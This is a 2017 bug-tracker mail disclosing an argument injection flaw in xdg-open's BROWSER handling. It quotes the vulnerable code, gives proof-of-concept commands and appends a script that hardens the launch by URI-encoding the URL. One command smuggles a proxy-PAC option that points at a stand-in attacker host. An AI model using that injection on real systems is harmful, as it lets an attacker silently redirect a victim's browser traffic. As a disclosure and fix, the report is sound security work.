[Portland-bugs] [Bug 103807] New: Argument injection in xdg-open open_envvar
bugzilla-daemon at freedesktop.org
Sat Nov 18 00:50:22 UTC 2017
https://bugs.freedesktop.org/show_bug.cgi?id=103807
Bug ID: 103807
Summary: Argument injection in xdg-open open_envvar
Product: Portland
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: major
Priority: medium
Component: xdg-utils
Assignee: portland-bugs at lists.freedesktop.org
Reporter: gabriel.corona at enst-bretagne.fr
xdg-open open_envvar is vulnerable to argument injection when BROWSER contains
%s:
This command:
BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito"
will open incognito mode of chromium (when open_envvar mode is used).
The corresponding code is:
if echo "$browser" | grep -q %s; then
$(printf "$browser" "$1")
This could be abused to silently set chromium proxy configuration which would
allow an attacker to redirect all of the browser traffic through a server under
his control:
BROWSER="chromium %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.com/proxy.pac"
One possible solution would be to URI-encode IFS characters in $1.
See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767 for a similar
problem in sensible-browser.
--
You are receiving this mail because:
You are the assignee for the bug.
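The mitigation suggested in the report (URI-encoding IFS characters in $1), shown next to the quoted pattern. This is an added example, not code from the report or from xdg-utils. The names count_args, open_unsafe, encode_ifs and open_hardened are hypothetical, count_args stands in for the browser binary, and the default IFS (space, tab, newline) is assumed.

```sh
#!/bin/sh
# Added example. count_args is a hypothetical stand-in for the browser binary:
# it prints how many arguments it received.
count_args() { echo "$#"; }

TAB=$(printf '\t')
NL='
'

# Pattern quoted in the report: the printf output is word-split by the shell,
# so whitespace inside the URL produces extra browser arguments.
open_unsafe() {
    browser=$1
    $(printf "$browser" "$2")
}

# Percent-encode the default IFS characters (space, tab, newline) in a URL.
encode_ifs() {
    in=$1
    out=
    while [ -n "$in" ]; do
        rest=${in#?}          # everything after the first character
        c=${in%"$rest"}       # the first character itself
        case $c in
            ' ')    c=%20 ;;
            "$TAB") c=%09 ;;
            "$NL")  c=%0A ;;
        esac
        out=$out$c
        in=$rest
    done
    printf '%s' "$out"
}

# Same launch path, but the URL can no longer be split into several words.
open_hardened() {
    browser=$1
    url=$(encode_ifs "$2")
    $(printf "$browser" "$url")
}

# Constructed input, taken from the report's first command line.
url='http://www.example.com/ --incognito'
echo "unsafe:   $(open_unsafe 'count_args %s' "$url") argument(s)"
echo "hardened: $(open_hardened 'count_args %s' "$url") argument(s)"
```

After encoding, word splitting still applies to the BROWSER value itself, which is the user's own configuration, but the URL always arrives as a single argument.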